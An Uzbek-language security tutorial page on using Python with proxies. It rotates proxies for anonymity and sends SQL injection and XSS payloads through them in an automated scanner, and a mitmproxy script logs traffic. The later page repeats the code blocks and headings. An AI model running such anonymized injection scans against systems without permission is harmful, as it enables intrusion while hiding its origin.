Python yordamida Proksi-Serverlar orqali Tarmoq Trafigini Tahlil Qilish

Proksi-serverlardan foydalanish orqali tarmoqqa yuborilayotgan va kelayotgan ma’lumotlarni kuzatish, filtrlash, va nazorat qilish mumkin. Bu metod xavfsizlik tahlillarida foydalidir, chunki u orqali tarmoqdan kelayotgan trafikni yoki yuborilayotgan so‘rovlarni boshqarish mumkin.

Asosiy Maqsadlar

Proksi orqali trafikni boshqarish: Yuborilgan yoki kelayotgan so‘rovlarni proksi orqali nazorat qilish.
Anonim tarzda test qilish: Testlarni anonim ravishda amalga oshirish.
Zaifliklarni aniqlash: Zaifliklarni tekshirish va hujum senariylarini o‘rganish.

Zarur Kutubxonalar

Proksi-serverlar bilan ishlash uchun requests kutubxonasi asosiy vositadir. Bundan tashqari, xavfsizlik tahlillarida ishlatiladigan boshqa kutubxonalar ham kerak bo‘lishi mumkin.

pip install requests

1 Proksi orqali HTTP So‘rovlar yuborish

Proksi-server yordamida HTTP so‘rovlarni qanday yuborish mumkinligini ko‘rib chiqamiz. requests kutubxonasida proksi sozlamalarini proxies parametri orqali berish mumkin.

import requests

# Proksi sozlamalar
proxies = {
    "http": "http://123.45.67.89:8080",
    "https": "http://123.45.67.89:8080"
}

# Proksi orqali so'rov yuborish
url = "https://httpbin.org/ip"
response = requests.get(url, proxies=proxies)
print("Proksi orqali IP:", response.json()["origin"])

Eslatma:

http va https protokollarini bir xil proksi bilan sozlash mumkin.
Agar proxies parametrlari to‘g‘ri bo‘lmasa, requests.exceptions.ProxyError xatosi yuz berishi mumkin.

2 Dinamik Proksi Serverlar Bilan Ishlash

Ba’zan dinamik tarzda proksi-serverlarni almashtirish talab qilinadi. Quyidagi misolda biz proksi ro‘yxatidan foydalanamiz va ularni aylanma tarzda sinab ko‘ramiz.

import requests
import random

# Proksi-serverlar ro‘yxati
proxy_list = [
    "http://123.45.67.89:8080",
    "http://98.76.54.32:8080",
    "http://192.168.1.1:8080"
]

def get_random_proxy():
    proxy = random.choice(proxy_list)
    return {
        "http": proxy,
        "https": proxy
    }

# Dinamik proksi-server orqali so‘rov yuborish
url = "https://httpbin.org/ip"
proxy = get_random_proxy()
response = requests.get(url, proxies=proxy)
print("Dinamik Proksi orqali IP:", response.json()["origin"])

Eslatma: Dinamik proksi-serverlar foydalanilganda, har bir so‘rovda IP manzil o‘zgarishi mumkin va bu anonimlikni oshiradi.

3. Proksi orqali Xavfsizlik Sinovlarini Bajarish

Proksi orqali zaifliklarni sinash ham mumkin. Bunda har bir so‘rov turli proksi-serverlar orqali o‘tishi va bu jarayon so‘rov yuborishda anonimlikni ta’minlashi mumkin.

SQL Injection Zaifligini Proksi orqali Sinash

Quyida SQL Injection zaifligini proksi-server orqali tekshirish misoli keltirilgan.

# SQL Injection test funksiyasi proksi orqali
def sql_injection_test(url, proxies):
    payloads = ["' OR '1'='1", "' OR 'a'='a", "' OR 'x'='y"]
    
    for payload in payloads:
        test_url = f"{url}?id={payload}"
        try:
            response = requests.get(test_url, proxies=proxies)
            if "error" in response.text.lower():
                print(f"[Zaiflik topildi] SQL Injection: {test_url}")
                break
        except requests.RequestException as e:
            print(f"[Xato] So‘rov bajarilmadi: {e}")

# Proksi va URL
proxy = get_random_proxy()
url = "https://example.com/item"

sql_injection_test(url, proxy)

Proksi orqali XSS (Cross-Site Scripting) Zaifligini Sinash

XSS zaifligini proksi orqali sinash ham mumkin. Quyidagi misolda XSS payloadlari yuboriladi.

def xss_test(url, proxies):
    payloads = ["<script>alert('XSS')</script>", "<img src='invalid' onerror='alert(1)'>"]
    
    for payload in payloads:
        test_url = f"{url}?query={payload}"
        try:
            response = requests.get(test_url, proxies=proxies)
            if payload in response.text:
                print(f"[Zaiflik topildi] XSS: {test_url}")
                break
        except requests.RequestException as e:
            print(f"[Xato] So‘rov bajarilmadi: {e}")

# Proksi va URL
proxy = get_random_proxy()
url = "https://example.com/search"

xss_test(url, proxy)

4 Proksi orqali HTTP So‘rovlarni Hijack qilish va Tahlil qilish

Proksi-serverlar orqali so‘rovlar hijack qilinishi va kelayotgan javoblar tahlil qilinishi mumkin. Quyidagi misolda mitmproxy kabi proksi vositalardan foydalanish orqali kelayotgan trafikni kuzatish va ularni tahlil qilish mumkin.

`mitmproxy` o‘rnatish

Bunda mitmproxy vositasini o‘rnatib olish kerak:

pip install mitmproxy

Python yordamida Proksi orqali Tahlil qilish

Quyidagi kod misoli mitmproxy yordamida har bir so‘rovni tahlil qiladi va zaruriy ma’lumotlarni chiqaradi.

from mitmproxy import http

def request(flow: http.HTTPFlow) -> None:
    # So‘rovning asosiy ma’lumotlarini chiqarish
    print("So‘rov URL:", flow.request.pretty_url)
    print("So‘rov metodi:", flow.request.method)
    print("So‘rov headers:", flow.request.headers)

def response(flow: http.HTTPFlow) -> None:
    # Javobdagi asosiy ma’lumotlarni chiqarish
    print("Javob status kodi:", flow.response.status_code)
    print("Javob matni:", flow.response.text[:100])  # Birinchi 100 ta belgi

mitmproxy orqali bu skriptni ishga tushirish uchun mitmdump buyruq qatorida ishlatiladi:

bashCopy codemitmdump -s "proxy_script.py"

Bu skript mitmproxy bilan ishlaydi va har bir so‘rov va javobni tahlil qiladi.

Eslatma: mitmproxy dan foydalanilganda mijozlar (masalan, brauzerlar yoki ilovalar) proksi sifatida mitmproxy ni tanlashi kerak bo‘ladi.

5 To‘liq Avtomatlashtirilgan Proksi orqali Zaiflik Sinov Dasturi

Quyidagi kod barcha yuqoridagi qismlarini birlashtirgan to‘liq dastur:

import requests
import random

# Proksi-serverlar ro‘yxati
proxy_list = [
    "http://123.45.67.89:8080",
    "http://98.76.54.32:8080",
    "http://192.168.1.1:8080"
]

def get_random_proxy():
    proxy = random.choice(proxy_list)
    return {
        "http": proxy,
        "https": proxy
    }

# SQL Injection zaifligini sinash
def sql_injection_test(url, proxies):
    payloads = ["' OR '1'='1", "' OR 'a'='a", "' OR 'x'='y"]
    for payload in payloads:
        test_url = f"{url}?id={payload}"
        try:
            response = requests.get(test_url, proxies=proxies)
            if "error" in response.text.lower():
                print(f"[Zaiflik topildi] SQL Injection: {test_url}")
                break
        except requests.RequestException as e:
            print(f"[Xato] So‘rov bajarilmadi: {e}")

# XSS zaifligini sinash
def xss_test(url, proxies):
    payloads = ["<script>alert('XSS')</script>", "<img src='invalid' onerror='alert(1)'>"]
    for payload in payloads:
        test_url = f"{url}?query={payload}"
        try:
            response = requests.get(test_url, proxies=proxies)
            if payload in response.text:
                print(f"[Zaiflik topildi] XSS: {test_url}")
                break
        except requests.RequestException as e:
            print(f"[Xato] So‘rov bajarilmadi: {e}")

# Tahlil qilish
url = "https://example.com"
proxy = get_random_proxy()
sql_injection_test(url, proxy)
xss_test(url, proxy)

Xulosa va Tavsiyalar

Proksi-serverlardan foydalanib tarmoq trafigini tahlil qilish xavfsizlik zaifliklarini aniqlash va anonimlikni oshirish imkonini beradi. Ammo, bu testlarni amalga oshirishda quyidagilarga rioya qiling:

Qonuniy ruxsat: Tahlillar faqat ruxsat olingan serverlarda bajarilishi kerak.
Ehtiyotkorlik: Ba’zi testlar, ayniqsa SQL Injection va XSS, serverga zarar yetkazishi mumkin.
Shaxsiy ma’lumotlar himoyasi: Shaxsiy ma’lumotlarni himoya qilish uchun SSL va xavfsiz proksi-serverlardan foydalaning.

PreviousPython yordamida Veb-serverlar Zaifliklarini Tahlil Qilish NextPython yordamida Web-trafikni O‘zgartirish

Last updated 1 day ago

import requests # Proksi sozlamalar proxies = { "http": "http://123.45.67.89:8080", "https": "http://123.45.67.89:8080" } # Proksi orqali so'rov yuborish url = "https://httpbin.org/ip" response = requests.get(url, proxies=proxies) print("Proksi orqali IP:", response.json()["origin"])

import requests import random # Proksi-serverlar ro‘yxati proxy_list = [ "http://123.45.67.89:8080", "http://98.76.54.32:8080", "http://192.168.1.1:8080" ] def get_random_proxy(): proxy = random.choice(proxy_list) return { "http": proxy, "https": proxy } # Dinamik proksi-server orqali so‘rov yuborish url = "https://httpbin.org/ip" proxy = get_random_proxy() response = requests.get(url, proxies=proxy) print("Dinamik Proksi orqali IP:", response.json()["origin"])

# SQL Injection test funksiyasi proksi orqali def sql_injection_test(url, proxies): payloads = ["' OR '1'='1", "' OR 'a'='a", "' OR 'x'='y"] for payload in payloads: test_url = f"{url}?id={payload}" try: response = requests.get(test_url, proxies=proxies) if "error" in response.text.lower(): print(f"[Zaiflik topildi] SQL Injection: {test_url}") break except requests.RequestException as e: print(f"[Xato] So‘rov bajarilmadi: {e}") # Proksi va URL proxy = get_random_proxy() url = "https://example.com/item" sql_injection_test(url, proxy)

def xss_test(url, proxies): payloads = ["<script>alert('XSS')</script>", "<img src='invalid' onerror='alert(1)'>"] for payload in payloads: test_url = f"{url}?query={payload}" try: response = requests.get(test_url, proxies=proxies) if payload in response.text: print(f"[Zaiflik topildi] XSS: {test_url}") break except requests.RequestException as e: print(f"[Xato] So‘rov bajarilmadi: {e}") # Proksi va URL proxy = get_random_proxy() url = "https://example.com/search" xss_test(url, proxy)

from mitmproxy import http def request(flow: http.HTTPFlow) -> None: # So‘rovning asosiy ma’lumotlarini chiqarish print("So‘rov URL:", flow.request.pretty_url) print("So‘rov metodi:", flow.request.method) print("So‘rov headers:", flow.request.headers) def response(flow: http.HTTPFlow) -> None: # Javobdagi asosiy ma’lumotlarni chiqarish print("Javob status kodi:", flow.response.status_code) print("Javob matni:", flow.response.text[:100]) # Birinchi 100 ta belgi

import requests import random # Proksi-serverlar ro‘yxati proxy_list = [ "http://123.45.67.89:8080", "http://98.76.54.32:8080", "http://192.168.1.1:8080" ] def get_random_proxy(): proxy = random.choice(proxy_list) return { "http": proxy, "https": proxy } # SQL Injection zaifligini sinash def sql_injection_test(url, proxies): payloads = ["' OR '1'='1", "' OR 'a'='a", "' OR 'x'='y"] for payload in payloads: test_url = f"{url}?id={payload}" try: response = requests.get(test_url, proxies=proxies) if "error" in response.text.lower(): print(f"[Zaiflik topildi] SQL Injection: {test_url}") break except requests.RequestException as e: print(f"[Xato] So‘rov bajarilmadi: {e}") # XSS zaifligini sinash def xss_test(url, proxies): payloads = ["<script>alert('XSS')</script>", "<img src='invalid' onerror='alert(1)'>"] for payload in payloads: test_url = f"{url}?query={payload}" try: response = requests.get(test_url, proxies=proxies) if payload in response.text: print(f"[Zaiflik topildi] XSS: {test_url}") break except requests.RequestException as e: print(f"[Xato] So‘rov bajarilmadi: {e}") # Tahlil qilish url = "https://example.com" proxy = get_random_proxy() sql_injection_test(url, proxy) xss_test(url, proxy)

Asosiy Maqsadlar

Zarur Kutubxonalar

1 Proksi orqali HTTP So‘rovlar yuborish

Eslatma:

2 Dinamik Proksi Serverlar Bilan Ishlash

3. Proksi orqali Xavfsizlik Sinovlarini Bajarish

SQL Injection Zaifligini Proksi orqali Sinash

Proksi orqali XSS (Cross-Site Scripting) Zaifligini Sinash

4 Proksi orqali HTTP So‘rovlarni Hijack qilish va Tahlil qilish

mitmproxy o‘rnatish

Python yordamida Proksi orqali Tahlil qilish

5 To‘liq Avtomatlashtirilgan Proksi orqali Zaiflik Sinov Dasturi

Xulosa va Tavsiyalar

Asosiy Maqsadlar

Zarur Kutubxonalar

1 Proksi orqali HTTP So‘rovlar yuborish

Eslatma:

2 Dinamik Proksi Serverlar Bilan Ishlash

3. Proksi orqali Xavfsizlik Sinovlarini Bajarish

SQL Injection Zaifligini Proksi orqali Sinash

Proksi orqali XSS (Cross-Site Scripting) Zaifligini Sinash

4 Proksi orqali HTTP So‘rovlarni Hijack qilish va Tahlil qilish

mitmproxy o‘rnatish

Python yordamida Proksi orqali Tahlil qilish

5 To‘liq Avtomatlashtirilgan Proksi orqali Zaiflik Sinov Dasturi

Xulosa va Tavsiyalar

`mitmproxy` o‘rnatish

`mitmproxy` o‘rnatish